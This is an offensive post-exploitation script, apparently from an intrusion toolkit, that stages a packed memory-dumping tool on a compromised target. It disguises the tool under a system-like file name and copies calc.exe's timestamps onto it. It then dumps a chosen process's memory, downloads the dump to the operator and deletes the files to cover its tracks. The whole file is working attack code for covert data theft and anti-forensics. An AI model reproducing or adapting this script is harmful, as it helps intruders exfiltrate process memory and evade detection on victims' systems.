89 lines
No EOL
2.4 KiB
PostScript
89 lines
No EOL
2.4 KiB
PostScript
#-------------------------------------------------------------------------------
|
|
# File: bindump.eps
|
|
# Description: Tries to run bindump on the target.
|
|
#
|
|
# 26 July 2007 Created....
|
|
#
|
|
#-------------------------------------------------------------------------------
|
|
int $offendingPID = GetInput("What is the PID for the offending process? (\"-1\" to exit)");
|
|
|
|
if ($offendingPID == -1) {
|
|
return false;
|
|
}
|
|
|
|
string $ScriptsDir = GetEnv("SCRIPTSDIR");
|
|
string $resources = GetEnv("RESOURCESDIR");
|
|
|
|
@echo on;
|
|
|
|
string $remoteToolName = GetEnv("remoteToolName");
|
|
string $sSysPath = GetEnv("SYSPATH");
|
|
|
|
if ($remoteToolName == "") {
|
|
$remoteToolName="$sSysPath\\cmdl16.exe";
|
|
}
|
|
|
|
ifnot (prompt "Do you want to upload the tool as \"$remoteToolName\" ?") {
|
|
$remoteToolName=GetInput("What do you want to upload the tool as?");
|
|
}
|
|
|
|
SetEnv("remoteToolName", "$remoteToolName");
|
|
|
|
string $split = SplitPath("$remoteToolName");
|
|
|
|
|
|
while (`put $ScriptsDir\\..\\..\\..\\B-Tools\\bindump_packed.exe -name $remoteToolName` == false) {
|
|
if (prompt "File exists, delete \"$remoteToolName\"?") {
|
|
`del $split[1] -path "$split[0]"`;
|
|
sleep(200);
|
|
} else {
|
|
return false;
|
|
}
|
|
}
|
|
@echo off;
|
|
`matchtimes $sSysPath\\calc.exe $remoteToolName`;
|
|
@record on;
|
|
`run -command "$remoteToolName $offendingPID" -redirect`;
|
|
@record off;
|
|
@echo on;
|
|
|
|
#grep out the sizes:
|
|
string $output = GetCmdData("output");
|
|
|
|
WriteFile("$resources\\bindmp.out",false,$output);
|
|
|
|
@record on;
|
|
`local grep -mask $resources\\bindmp.out -pattern "Module: 0"`;
|
|
@record off;
|
|
`local run -command "cmd.exe /C del $resources\\bindmp.out"`;
|
|
string $match = GetCmdData("line_data");
|
|
if (sizeof($match) == 0) {
|
|
echo "Something when wrong, are you sure that PID exists?";
|
|
prompt `del $split[1] -path "$split[0]"`;
|
|
|
|
return false;
|
|
}
|
|
|
|
echo "The size of the bin-dump output is listed (IN HEX) as the last line above.";
|
|
echo "IF THIS AMOUNT IS REALLY BIG, OR IF THERE IS NOT 2X THIS AMOUNT OF ROOM ON THE DISK, SAY NO HERE.";
|
|
|
|
if (prompt "\nDo you want to bindump this exe?") {
|
|
@echo off;
|
|
prompt `run -command "$remoteToolName $offendingPID ~Wa8z1.tmp 0" -redirect bindump`;
|
|
@echo on;
|
|
}
|
|
|
|
|
|
`dir ~Wa8z1.tmp`;
|
|
if (prompt "Download \"~Wa8z1.tmp\" (the output file, size listed above)?") {
|
|
`get ~Wa8z1.tmp`;
|
|
}
|
|
|
|
if (prompt "Delete both files? (wait until get is done)") {
|
|
`del ~Wa8z1.tmp`;
|
|
`del $split[1] -path "$split[0]"`;
|
|
`dir ~Wa8z1.tmp`;
|
|
`dir $split[1] -path "$split[0]"`;
|
|
}
|
|
|
|
return true; |